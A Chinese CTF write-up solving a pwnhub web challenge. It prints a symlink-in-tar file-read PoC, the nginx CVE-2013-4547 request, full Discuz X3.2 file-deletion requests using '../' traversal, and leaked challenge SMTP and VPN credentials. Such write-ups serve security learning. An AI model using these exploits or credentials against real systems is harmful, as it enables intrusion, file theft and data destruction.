作者:Hcamael@知道創宇404實驗室
發布時間:2017-10-04
Step 0
首先是.DS_Store信息泄露,下載下來是一個二進制文件,需要解析,google搜一搜就有了:
>>> from ds_store import DSStore
>>> with DSStore.open("DS_Store", "r+") as f:
... for i in f:
... print i
<admin Iloc>
<admin bwsp>
<admin vSrn>
<config Iloc>
<config bwsp>
<config vSrn>
<includes Iloc>
<includes bwsp>
<includes vSrn>
<index.html Iloc>
<index.php Iloc>
<index.php ptbL>
<index.php ptbN>
<pwnhub Iloc>
<pwnhub bwsp>
<pwnhub vSrn>
<upload Iloc>
<upload bwsp>
<upload vSrn>Step 1
根據提示:2017.10.02 15:45:49Nginx 雖然有過很多問題,但是它是個好 server
猜測應該是利用一個NGINX的CVE
然后在上一步發現一個奇怪的地方,最后一個是uploap[space] 目錄而不是uploap目錄,有一個空格。
根據這些信息,搜到一個CVE,編號是CVE-2013-4547
....題目關了,搞不到圖了。
payload是:GET upload /../pwnhub/ HTTP/1.1
這里不能使用瀏覽器,因為瀏覽器會把這url變成/pwnhub/
得到一個路徑:6c58c8751bca32b9943b34d0ff29bc16/index.php
Step 2
6c58c8751bca32b9943b34d0ff29bc16/index.php是一個文件上傳的服務
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15"></textarea></form>
</body>
</html>一開始嘗試上傳各種文件,都能成功,但是配置更新成功并沒有顯示任何內容,包括上傳tar文件,懵逼了一會。。。
然后發現,這個目錄也有.DS_Store泄露:
>>> with DSStore.open("DS_Store", "r+") as f:
... for i in f:
... print "|%s|"%i.filename
|index.php|
|untar.py|有一個untar.py文件:
import tarfile
import sys
import uuid
import os
def untar(filename):
os.chdir('/tmp/pwnhub/')
t = tarfile.open(filename, 'r')
for i in t.getnames():
if '..' in i or '.cfg' != os.path.splitext(i)[1]:
return 'error'
else:
try:
t.extract(i, '/tmp/pwnhub/')
except Exception, e:
return e
else:
cfgName = str(uuid.uuid1()) + '.cfg'
os.rename(i, cfgName)
return cfgName
if __name__ == '__main__':
filename = sys.argv[1]
if not tarfile.is_tarfile(filename):
exit('error')
else:
print untar(filename)很明顯了,要壓縮一個cfg文件
$ echo "fjwopqafjasdo" > /tmp/test.cfg
$ tar cf /tmp/test.tar /tmp/test.cfg然后上傳test.tar,更新配置成功后終于成功返回內容了。
但是該怎么利用又卡住了,然后看到hint:2017.10.03 11:24:40想辦法把它變成任意文件讀取,但 Flag 不在這兒 ,當作一次真實滲透玩吧!
想到了軟鏈接,PoC如下:
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import re
import requests
from bs4 import BeautifulSoup
def upload():
url = "http://54.223.177.152/6c58c8751bca32b9943b34d0ff29bc16/index.php"
files = {"upload": ("test.tar", open("/tmp/test.tar", "rb"), "application/x-tar")}
r = requests.post(url, files=files)
data = r.content
# html = BeautifulSoup(data, "lxml")
# print html.textarea.contents[0]
print data
def main():
filename = sys.argv[1]
print filename
os.system("ln -sf %s /tmp/test.cfg"%filename)
os.system("tar cf /tmp/test.tar /tmp/test.cfg")
upload()
if __name__ == '__main__':
main()Step 3
到了任意文件讀取的步驟了,然后各種文件讀讀,照例我都會讀讀/proc/self下的文件,然后發現:
$ python 2013_read_file.py /proc/self/mountinfo
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15">181 103 0:40 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay/a67f9242dc6db4569b299d14ce4308f2f63624e8387569cbe015cbc973e50a0c/root,upperdir=/var/lib/docker/overlay/ea20e67da7b4415fd04862f8f7a0bef6a2b6ace2f5ec2e664d07cb9b6280bc8c/upper,workdir=/var/lib/docker/overlay/ea20e67da7b4415fd04862f8f7a0bef6a2b6ace2f5ec2e664d07cb9b6280bc8c/work
182 181 0:43 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
238 181 0:44 / /dev rw,nosuid - tmpfs tmpfs rw,mode=755
239 238 0:45 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
240 181 0:46 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
241 240 0:47 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
242 241 0:22 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd
243 241 0:24 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
244 241 0:25 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
245 241 0:26 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
246 241 0:27 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
247 241 0:28 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
248 241 0:29 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
249 241 0:30 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
250 241 0:31 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
251 241 0:32 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
252 241 0:33 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
253 238 0:42 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
254 181 202:1 /home/ubuntu/Nginx_1.4.2/crontab /etc/crontab rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
255 181 202:1 /home/ubuntu/Nginx_1.4.2/pwnhub /tmp/pwnhub rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
256 181 202:1 /var/lib/docker/containers/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
257 181 202:1 /var/lib/docker/containers/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23/hostname /etc/hostname rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
258 181 202:1 /var/lib/docker/containers/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23/hosts /etc/hosts rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
259 238 0:41 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
260 181 202:1 /home/ubuntu/Nginx_1.4.2/html /usr/local/nginx/html rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
261 238 202:1 /home/ubuntu/Nginx_1.4.2/access.log /dev/stdout rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
262 181 202:1 /home/ubuntu/Nginx_1.4.2/run /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
263 181 202:1 /home/ubuntu/Nginx_1.4.2/nginx.conf /usr/local/nginx/conf/nginx.conf rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
264 181 202:1 /home/ubuntu/Nginx_1.4.2/cron_run.sh /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
419 181 202:1 /home/ubuntu/Nginx_1.4.2/www.conf /etc/php5/fpm/pool.d/www.conf rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
104 238 0:45 /0 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
107 182 0:43 /bus /proc/bus ro,relatime - proc proc rw
108 182 0:43 /fs /proc/fs ro,relatime - proc proc rw
109 182 0:43 /irq /proc/irq ro,relatime - proc proc rw
110 182 0:43 /sys /proc/sys ro,relatime - proc proc rw
111 182 0:43 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
112 182 0:44 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,mode=755
113 182 0:44 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,mode=755
114 182 0:44 /null /proc/timer_stats rw,nosuid - tmpfs tmpfs rw,mode=755
115 182 0:44 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,mode=755
132 240 0:48 / /sys/firmware ro,relatime - tmpfs tmpfs ro
</textarea></form>
</body>
</html>發現一個腳本:/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh
$ python 2013_read_file.py /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh
tar: Removing leading `/' from member names
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15">#\!/bin/bash
cd /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/ && python run.py
</textarea></form>
</body>
</html>
$ python 2013_read_file.py /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/run.py
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/run.py
tar: Removing leading `/' from member names
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15">#encoding=utf8
from collections import Counter
from mail_send import send_mail
ip = []
statusCode = []
def toDeal(filename):
with open(filename, 'r') as f:
logs = f.readlines()
for log in logs:
ip.append(log.split()[0])
statusCode.append(log.split()[8])
logAll = '日志總數:' + str(len(logs))
ipUV = '獨立 IP:' + str(list(set(ip)))
ipNumber = 'IP出現次數:' + str(dict(Counter(ip)))
codeNumber = '狀態碼出現次數:' + str(dict(Counter(statusCode)))
content = logAll + '\n' + ipUV + '\n' + ipNumber + '\n' + codeNumber
send_mail('Pwnhub Nginx Report', content)
if __name__ == '__main__':
toDeal('/usr/local/var/log/nginx/access.log')
</textarea></form>
</body>
</html>
$ python 2013_read_file.py /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/mail_send.py
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/mail_send.py
tar: Removing leading `/' from member names
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15">#coding:utf-8
import smtplib
from email.mime.text import MIMEText
mail_user = 'ctf_dicha@21cn.com'
mail_pass = '634DRaC62ehWK6X'
mail_server = 'smtp.21cn.com'
mail_port = 465
to_user = 'wyd0n9@gmail.com'
def send_mail(title,content):
#創建一個實例,這里設置為html格式郵件
msg = MIMEText(content, _subtype = 'html', _charset = 'utf-8')
msg['Subject'] = title
msg['From'] = mail_user
msg['To'] = to_user
try:
#登錄smtp服務器
server = smtplib.SMTP_SSL(mail_server,mail_port)
server.login(mail_user,mail_pass)
#郵件發送
server.sendmail(mail_user,to_user,msg.as_string())
server.quit()
return True
except Exception as e:
print(str(e))
return False
</textarea></form>
</body>
</html>Step 4
得到一個郵箱,然后嘗試去登錄看看,然后在收件箱看到一個發送vpn郵箱發送失敗的返回郵件,然后去發件箱得到一個vpn:
IPsec VPN server is now ready for use!
Connect to your new VPN with these details:
Server IP: 54.223.177.152
IPsec PSK: dkQ97gGQPuVm833Ed2F9
Username: pwnhub
Password: LE3U2aTgc4DGZd92wg82
Write these down. You'll need them to connect!這里想找個linux圖形界面連IPsec的軟件,但沒找到,還是切換到Mac了。。
VPN連上后應該就是內網找服務了,因為nmap探測的很慢,所以只探測80端口
咸魚了一會后發現幾臺主機:
172.17.0.1
172.17.0.3
172.17.0.5
172.17.0.7
172.17.0.9從這可以看出來這是一個docker,其中1是外網那個服務的容器,其他80端口都是nginx默認端口,然后掃描3發現還開了8090,根據之后的提示:搞 Discuz 不是目的,誰說雞肋就沒用,看 Discuz 送助攻
Step 5
8090端口開的就是一個dz x3.2服務,然后就知道是搞這個了,找了下dz的漏洞去嘗試,發現只有ssrf,有最新的任意文件刪除的是有效的。
然后發現自己太菜了,根本不會做web,日不動dz。。。。。。
然后偶然間發現。。。。80端口變了,竟然不是默認的nginx服務了, 是一個跳轉到index.php的html頁面,index.php頁面如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>get flag?</title>
</head>
<!-- include 'safe.php';
if($_REQUEST['passwd'] === 'jiajiajiajiajia'){
echo "$flag";
} -->
</body>
</html>
Oh,Hacked ?嘗試訪問:http://172.17.0.3/index.php?passwd=jiajiajiajiajia當然是失敗的,因為有個safe.php
然后根據前面dz獲取到的信息,猜測safe.php是ip過濾,然后我得到一個思路(當然是錯誤的思路): 利用dz的ssrf訪問http://127.0.0.1/index.php?passwd=jiajiajiajiajia, 因為dz的ssrf是一個遠程圖片下載的,所以會把請求到的信息下載下來保存到本地,然后/data目錄是可遍歷的,文件會下載到data/attachment/profile/201710/0x目錄下。
但是目錄遍歷到201710就沒法遍歷了,發現是有一個index.html,然后有了一個思路,是利用任意文件刪除漏洞把index.html刪除,成功了,可以看到data/attachment/profile/201710/04/目錄下的文件了,然后嘗試ssrf,但是是失敗的,源碼審計看了一會,原來dz把ssrf請求下來的保存成文件后會獲取圖片信息,如果獲取失敗會刪除。
想了想競爭,但是從保存文件到刪除文件,間隔時間太短了,競爭不靠譜。。。又陷入僵局
然后出題人半夜改題了,一個開始80是nginx服務,dz是apache服務。然后換成了80是apache,dz是nginx。
然后我之前的思路就完成GG了,因為無法獲取到下載下來的文件名。
然后就只剩一個思路了,利用dz的任意文件刪除漏洞,刪除safe.php
最開始我也想過這個,但是這個思路的問題太多了,一個是兩個不同服務,憑啥有權限刪除,safe.php又不是在upload這種會777的目錄下,第二就是,一個人做出來了其他人不也做出來了
半夜2點多的時候嘗試刪除safe.php,失敗,睡覺,早上9點多起來發現已經3血了,再次嘗試,成功。。。。。。。。。。。。。。。。。。
沒有寫PoC,手工做題,首先python先跑起來:
>>> while True:
... r = requests.get(url3)
... print r.content
... if r.status_code == 404:
... print "right"
... r = requests.get(url2)
... print r.content
... time.sleep(1)
Oh,Hacked ?然后使用burp,首先是請求:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: 172.17.0.3:8090
Content-Length: 2244
Cache-Control: max-age=0
Origin: http://172.17.0.3:8090
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHL816KVx2cHVmZcq
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 3LFi_2132_saltkey=iAo9aN8L; 3LFi_2132_lastvisit=1507028276; 3LFi_2132_sendmail=1; 3LFi_2132_home_readfeed=1507037399; 3LFi_2132_seccode=19.90700de229cc94ae7e; 3LFi_2132_ulastactivity=5e6dmN2yw6RW9gYAeu0%2BFQj4zPpXufkmFS79DZbibxsS1GKyf30i; 3LFi_2132_auth=e93etvAAYQo0lvRVwL9syLfiWnGnZj7HnZAZRfhXA84VUXaWbScrKrKqleMUclzMt%2FB67ybK%2FTtRoNhg%2FF7V; 3LFi_2132_lastcheckfeed=3%7C1507037417; 3LFi_2132_lip=172.17.0.2%2C1507030640; 3LFi_2132_nofavfid=1; 3LFi_2132_onlineusernum=1; 3LFi_2132_checkpm=1; 3LFi_2132_sid=QGWdpE; 3LFi_2132_lastact=1507037551%09misc.php%09patch
Connection: close
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="formhash"
89dbe522
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="realname"
aklis
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[realname]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="gender"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[gender]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="birthyear"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="birthmonth"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="birthday"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[birthday]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="birthprovince"
../../../../../../../../../usr/share/nginx/html/safe.php
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[birthcity]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="resideprovince"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[residecity]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="affectivestatus"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[affectivestatus]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="lookingfor"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[lookingfor]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="bloodtype"
A
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[bloodtype]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="profilesubmit"
true
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="profilesubmitbtn"
true
------WebKitFormBoundaryHL816KVx2cHVmZcq--然后再請求:
POST /home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaa HTTP/1.1
Host: 172.17.0.3:8090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.1
Content-Length: 543
Cookie: 3LFi_2132_saltkey=iAo9aN8L; 3LFi_2132_lastvisit=1507028276; 3LFi_2132_home_readfeed=1507037399; 3LFi_2132_ulastactivity=5e6dmN2yw6RW9gYAeu0%2BFQj4zPpXufkmFS79DZbibxsS1GKyf30i; 3LFi_2132_auth=e93etvAAYQo0lvRVwL9syLfiWnGnZj7HnZAZRfhXA84VUXaWbScrKrKqleMUclzMt%2FB67ybK%2FTtRoNhg%2FF7V; 3LFi_2132_lastcheckfeed=3%7C1507037417; 3LFi_2132_nofavfid=1; 3LFi_2132_visitedfid=2; 3LFi_2132_forum_lastvisit=D_2_1507041771; 3LFi_2132_st_p=3%7C1507041805%7C587c0547c79d9aad1865192204c3e348; 3LFi_2132_viewid=tid_1; 3LFi_2132_lip=172.17.0.2%2C1507041386; 3LFi_2132_st_t=3%7C1507042459%7Cec88a27fedbb1c6205e196d933f91e42; 3LFi_2132_editormode_e=1; 3LFi_2132_seccode=47.a0f88955fd6a0cfce9; 3LFi_2132_smile=1D1; 3LFi_2132_onlineusernum=9; 3LFi_2132_checkpm=1; 3LFi_2132_sendmail=1; 3LFi_2132_home_diymode=1; 3LFi_2132_sid=A92w24; 3LFi_2132_lastact=1507046589%09home.php%09misc
Content-Type: multipart/form-data; boundary=2b4ed56c9a8d4dff838f4fba3c258b9b
--2b4ed56c9a8d4dff838f4fba3c258b9b
Content-Disposition: form-data; name="profilesubmit"
1
--2b4ed56c9a8d4dff838f4fba3c258b9b
Content-Disposition: form-data; name="formhash"
89dbe522
--2b4ed56c9a8d4dff838f4fba3c258b9b
Content-Disposition: form-data; name="birthprovince"; filename="a.png"
Content-Type: image/png
PS: 正常的圖片,因為有不可顯字符,就不復制上來了,懶得截圖....
--2b4ed56c9a8d4dff838f4fba3c258b9b--然后成功getflag:
File not found.
right
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>get flag?</title>
</head>
<!-- include 'safe.php';
if($_REQUEST['passwd'] === 'jiajiajiajiajia'){
echo "$flag";
} -->
</body>
</html>
pwnhub{flag:800eaf3244994b224c30e5f24b59f178}PS: 這題我給的評分是4,我覺得最后一步是本題的敗筆,首先環境的問題就不說了。主要是這個思路,只是為出題而設置的,沒啥其他意義。。。。前面的思路都挺好的。
本文就附一張圖:
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/442/
